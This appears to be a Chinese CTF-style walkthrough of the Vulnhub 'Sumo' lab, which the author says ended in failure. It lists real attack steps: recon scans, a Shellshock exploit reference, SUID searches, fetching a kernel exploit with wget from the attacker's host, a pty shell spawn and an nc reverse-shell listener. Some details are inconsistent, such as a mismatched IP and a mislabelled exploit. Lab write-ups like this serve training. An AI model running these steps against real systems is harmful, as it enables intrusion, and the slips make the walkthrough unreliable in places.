靶机渗透测试(Sumo_Sun*):
Vulnhub靶机 Sumo_Sun*
靶机:修改靶机的网络配置为桥接模式。
攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。
靶机难度:(Beginner)
目标:成功渗透进入靶机,得到root shell ,提升至root权限!
渗透流程:
1. 探测靶机ip地址(netdiscover -i eth0 -r 网关)
得到靶机ip地址:192.168.10.22
2. nmap进行靶机端口服务扫描
nmap -sS -Pn -A -p- -n 靶机ip
发现靶机开放了22-ssh端口服务,与80-http服务端口;
3. 根据端口服务进行渗透(80-http端口服务)
3.1 web网页渗透:
进入web网页,查看源代码信息等等,无果!!!
3.2 目录扫描:
御剑,kali-dirb工具进行目录扫描:
dirb http://192.168.10.22
并没有扫出有用目录!!!
尝试了/usr/share/dirb/wordlists中的每个单词列表,但是都未返回任何结果,只有一个/cgi-bin/test脚本。
3.3 使用kali工具Nikto:(nikto -h 靶机ip)
揭示了两个潜在的攻击向量,包括shellshock,以及由于Apache模块强制使用文件名的能力,在google中找出如何利用shellshock漏洞后,能够利用shellshock漏洞:https://www.exploit-db.com/exploits/34900
3.4 下载py脚本至kali虚拟机,运行Python命令;
3.5 权限提升
搜索目录,无果!!
检查了SUID二进制文件,但它没有返回任何有用的结果。
find / perm -u=s -type f 2 >/dev/null
检查了所有具有777权限的文件,同样没有得到有用的结果。
find / -type f -perm -0777
3.6 内核检测:
下一步检查是否存在任何内核漏洞。使用命令检查内核版本:
searchsploit 内核版本
searchsploit 3.2.0
列表中有内核漏洞,允许本地特权升级。使用命令locate linux_x86-64/local/33589.c 可以查找给文件在kali中的具体地址。在kali开启apache服务,然后把33589文件放在/var/www/html/下,在shell中使用wget命令下载文件 wget http://172.168.10.37/33589.c,使用python打开个终端,python -c ‘import pty;pty.spawn("/bin/bash")’
3.7 gcc编译:
gcc 33589.c -O2 -o exploit
./exploit 0
使用命令反弹shell,再开个终端监听端口:
nc -lvnp 6666
实验总结:
该靶机使用kali的脏牛提权,以及需要自己上网查阅版本漏洞,编译脚本,和添加新的环境变量,对于自己来说,工作技术要求太大,未能成功实现渗透!!!默默的记录一波,哭辽~~